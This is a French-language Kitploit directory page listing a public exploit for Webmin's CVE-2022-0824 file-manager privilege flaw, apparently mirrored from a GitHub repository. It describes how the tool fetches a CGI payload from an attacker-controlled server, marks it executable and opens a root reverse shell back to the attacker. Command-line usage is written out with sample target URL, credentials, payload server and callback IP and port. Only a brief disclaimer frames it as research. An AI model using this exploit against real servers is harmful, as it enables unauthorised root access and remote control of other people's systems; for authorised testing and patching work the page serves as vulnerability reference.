Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Webmin-CVE-2022-0824-revshell — Exploit de shell inversé post-authentification pour Webmin <=1.984 exploitant la CVE-2022-0824, une élévation de privilèges dans le gestionnaire de fichiers. Télécharge et exécute une charge utile CGI pour obtenir un accès root. | Kitploit
Outils/GitHubGitHub/faisalfs10x/webmin-cve-2022-0824-revshell
Escalade de PrivilègesGénération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubfaisalfs10x/webmin-cve-2022-0824-revshell

Webmin-CVE-2022-0824-revshell

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit de shell inversé post-authentification pour Webmin <=1.984 exploitant la CVE-2022-0824, une élévation de privilèges dans le gestionnaire de fichiers. Télécharge et exécute une charge utile CGI pour obtenir un accès root.

Voir le dépôt
1113357il y a 4 ansVérifié par Kitploit

Webmin-CVE-2022-0824-revshell

Description de la vulnérabilité

Webmin 1.984 et versions inférieures - Exploitation des privilèges du gestionnaire de fichiers (CVE-2022-0824 et CVE-2022-0829)
Les utilisateurs Webmin moins privilégiés qui n'ont configuré aucune restriction du module Gestionnaire de fichiers peuvent accéder aux fichiers avec les privilèges root, s'ils utilisent le thème Authentic par défaut. Tous les systèmes avec des utilisateurs Webmin non fiables supplémentaires doivent être mis à jour immédiatement. Notez que les systèmes Virtualmin ne sont pas affectés par ce bogue, en raison de la manière dont les utilisateurs Webmin propriétaires de domaine sont configurés.
Source : https://www.webmin.com/security.html

Description de l'exploit

Cet exploit tire parti de la vulnérabilité de contrôle d'accès inapproprié post-authentification dans le Gestionnaire de fichiers. Cet exploit peut être réalisé par tout attaquant authentifié moins privilégié. Il téléchargera un fichier .cgi à distance depuis un serveur contrôlé par l'attaquant et modifiera ses permissions pour en faire un fichier exécutable par tout le monde. Une fois cela fait, il exécutera le fichier .cgi pour établir une connexion inverse vers le serveur contrôlé par l'attaquant avec les privilèges root.

Référence : https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/

Utilisation

$~ python3 Webmin-revshell.py -t [TARGET] -c [CREDENTIAL] -LS [PY3HTTP_SERVER] -L [CALLBACK_IP] -P [CALLBACK_PORT]
$~ python3 Webmin-revshell.py -t https://192.168.5.118:10000 -c user:user123 -LS 192.168.5.120:9090 -L 192.168.5.120 -P 4444

$~  python3 Webmin-revshell.py -h                                                                                                                                    
    usage: Webmin-revshell.py [-h] -t TARGET -c CREDENTIAL -LS PY3HTTP_SERVER -L CALLBACK_IP -P CALLBACK_PORT [-V]

    Webmin CVE-2022-0824 Reverse Shell

    optional arguments:
      -h, --help            show this help message and exit
      -t TARGET, --target TARGET
                            Target full URL, https://www.webmin.local:10000
      -c CREDENTIAL, --credential CREDENTIAL
                            Format, user:user123
      -LS PY3HTTP_SERVER, --py3http_server PY3HTTP_SERVER
                            Http server for serving payload, ex 192.168.5.120:8080
      -L CALLBACK_IP, --callback_ip CALLBACK_IP
                            Callback IP to receive revshell
      -P CALLBACK_PORT, --callback_port CALLBACK_PORT
                            Callback port to receive revshell
      -V, --version         show program's version number and exit

PoC

target host: https://192.168.5.118:10000
attacker host: 192.168.5.120

https://user-images.githubusercontent.com/51811615/156904265-80c2ee4f-8447-41cd-9197-446bf6555e25.mp4

Testé sur

- Webmin 1.984
- Ubuntu 18.04
- Kali 2021.3

Avertissement :

Ce script est uniquement destiné à l'analyse de sécurité et à la recherche. Je ne saurais être tenu responsable s'il est utilisé pour des activités illicites.
Télécharger l’outil